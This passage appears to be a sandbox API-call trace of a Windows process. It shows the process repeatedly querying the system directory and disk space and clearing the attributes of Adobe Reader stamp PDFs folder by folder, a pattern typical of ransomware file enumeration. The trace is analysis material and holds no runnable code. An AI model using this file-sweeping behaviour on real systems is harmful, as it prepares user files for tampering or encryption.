nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.623] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.623] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.623] CoTaskMemFree (pv=0x506980) [0108.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.627] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.628] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.628] CoTaskMemFree (pv=0x506980) [0108.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.629] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.629] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.629] CoTaskMemFree (pv=0x506980) [0108.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.634] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.634] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.634] CoTaskMemFree (pv=0x506980) [0108.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.635] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.635] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.635] CoTaskMemFree (pv=0x506980) [0108.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.640] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.640] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.641] CoTaskMemFree (pv=0x506980) [0108.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.643] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.643] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.643] CoTaskMemFree (pv=0x506980) [0108.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.647] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.647] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.647] CoTaskMemFree (pv=0x506980) [0108.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.648] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.648] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.649] CoTaskMemFree (pv=0x506980) [0108.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.653] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.654] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.654] CoTaskMemFree (pv=0x506980) [0108.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.655] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.655] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.656] CoTaskMemFree (pv=0x506980) [0108.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.660] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.660] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.660] CoTaskMemFree (pv=0x506980) [0108.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.661] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.661] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.661] CoTaskMemFree (pv=0x506980) [0108.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.665] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.666] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.666] CoTaskMemFree (pv=0x506980) [0108.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.667] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.667] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.668] CoTaskMemFree (pv=0x506980) [0108.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.673] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.673] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.673] CoTaskMemFree (pv=0x506980) [0108.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.674] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.674] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.674] CoTaskMemFree (pv=0x506980) [0108.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.679] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.679] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.679] CoTaskMemFree (pv=0x506980) [0108.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.681] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.681] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.681] CoTaskMemFree (pv=0x506980) [0108.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.686] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.686] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.686] CoTaskMemFree (pv=0x506980) [0108.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.687] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.687] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.687] CoTaskMemFree (pv=0x506980) [0108.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.691] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.691] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.691] CoTaskMemFree (pv=0x506980) [0108.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.692] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.692] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.692] CoTaskMemFree (pv=0x506980) [0108.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.693] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.693] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.694] CoTaskMemFree (pv=0x506980) [0108.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.695] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.695] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.695] CoTaskMemFree (pv=0x506980) [0108.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.698] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0108.715] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf", dwFileAttributes=0x80) returned 1 [0108.718] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.718] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.718] CoTaskMemFree (pv=0x506980) [0108.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.722] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.731] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0108.734] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.741] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0108.744] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.752] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0108.754] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.761] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0108.763] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.780] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0108.784] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.851] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0108.858] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.858] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.858] CoTaskMemFree (pv=0x506980) [0108.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.860] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.872] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0108.874] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.881] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\Hanko.pdf", dwFileAttributes=0x80) returned 1 [0108.883] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.891] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0108.894] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.906] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0108.909] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.909] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.910] CoTaskMemFree (pv=0x506980) [0108.911] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.920] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0108.923] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.937] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\Hanko.pdf", dwFileAttributes=0x80) returned 1 [0108.940] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.947] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0108.950] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.971] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0108.975] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0108.975] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.975] CoTaskMemFree (pv=0x506980) [0108.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0108.979] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.986] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0108.988] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0108.994] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0108.996] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.003] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0109.005] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.088] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.093] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.119] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0109.122] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.137] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.140] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0109.140] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.141] CoTaskMemFree (pv=0x506980) [0109.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.142] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.150] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.153] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.160] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.163] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.176] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.179] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0109.179] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.179] CoTaskMemFree (pv=0x506980) [0109.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.181] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.187] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.189] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.197] SetFileAttributesW (lpFileName="C:\\Program Files 